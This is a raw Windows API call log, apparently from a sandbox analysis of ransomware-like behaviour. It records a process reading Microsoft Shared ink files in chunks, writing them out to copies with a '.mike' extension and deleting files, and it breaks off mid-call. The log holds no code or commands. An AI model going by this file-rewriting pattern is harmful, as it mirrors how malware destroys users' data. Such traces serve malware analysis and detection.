(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.850] GetFileType (hFile=0x264) returned 0x1 [0042.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.850] GetFileType (hFile=0x264) returned 0x1 [0042.850] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x98a20 [0042.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.851] GetFileType (hFile=0x264) returned 0x1 [0042.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.851] GetFileType (hFile=0x264) returned 0x1 [0042.851] ReadFile (in: hFile=0x264, lpBuffer=0x21f5030, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f5030*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.852] GetFileType (hFile=0x264) returned 0x1 [0042.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.852] GetFileType (hFile=0x264) returned 0x1 [0042.852] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x9b220 [0042.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.853] GetFileType (hFile=0x264) returned 0x1 [0042.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.853] GetFileType (hFile=0x264) returned 0x1 [0042.853] ReadFile (in: hFile=0x264, lpBuffer=0x2201fd8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2201fd8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.854] GetFileType (hFile=0x264) returned 0x1 [0042.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.903] WriteFile (in: hFile=0x264, lpBuffer=0x22c2708*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22c2708*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.903] CloseHandle (hObject=0x264) returned 1 [0042.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", dwFileAttributes=0x80) returned 0 [0042.913] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.913] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0042.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe39809c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe39809c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3c7a540, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc16b0)) returned 1 [0042.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0042.914] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.914] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.914] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike")) returned 1 [0042.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0042.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0042.922] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0042.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.923] GetFileType (hFile=0x264) returned 0x1 [0042.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0042.923] GetFileType (hFile=0x264) returned 0x1 [0042.923] CloseHandle (hObject=0x264) returned 1 [0042.923] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.923] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.923] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.924] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c5e1c | out: lpFileInformation=0x22c5e1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5)) returned 1 [0042.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.924] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c6114 | out: lpFileInformation=0x22c6114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5)) returned 1 [0042.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.924] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.925] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.925] GetFileType (hFile=0x264) returned 0x1 [0042.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.925] GetFileType (hFile=0x264) returned 0x1 [0042.925] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.925] WriteFile (in: hFile=0x264, lpBuffer=0x22c6e8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22c6e8c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.926] CloseHandle (hObject=0x264) returned 1 [0042.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c69c8 | out: lpFileInformation=0x22c69c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5)) returned 1 [0042.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.927] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.927] GetFileType (hFile=0x264) returned 0x1 [0042.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.927] GetFileType (hFile=0x264) returned 0x1 [0042.927] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.927] ReadFile (in: hFile=0x264, lpBuffer=0x22c7fa4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22c7fa4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.960] CloseHandle (hObject=0x264) returned 1 [0042.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.961] GetFileType (hFile=0x264) returned 0x1 [0042.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.961] GetFileType (hFile=0x264) returned 0x1 [0042.961] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.962] WriteFile (in: hFile=0x264, lpBuffer=0x22d250c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x22d250c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.962] CloseHandle (hObject=0x264) returned 1 [0042.963] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.963] GetFileType (hFile=0x264) returned 0x1 [0042.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.963] GetFileType (hFile=0x264) returned 0x1 [0042.963] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0042.963] ReadFile (in: hFile=0x264, lpBuffer=0x22d4f44, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22d4f44*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.963] CloseHandle (hObject=0x264) returned 1 [0042.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.964] GetFileType (hFile=0x264) returned 0x1 [0042.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.964] GetFileType (hFile=0x264) returned 0x1 [0042.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0042.964] WriteFile (in: hFile=0x264, lpBuffer=0x22df4ac*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x22df4ac*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.965] CloseHandle (hObject=0x264) returned 1 [0042.968] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.968] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.968] GetFileType (hFile=0x264) returned 0x1 [0042.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.968] GetFileType (hFile=0x264) returned 0x1 [0042.968] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0042.968] ReadFile (in: hFile=0x264, lpBuffer=0x22e1ee4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22e1ee4*, lpNumberOfBytesRead=0x2af0c8*=0x19a5, lpOverlapped=0x0) returned 1 [0042.968] CloseHandle (hObject=0x264) returned 1 [0042.971] GetFullPathNameW (in: 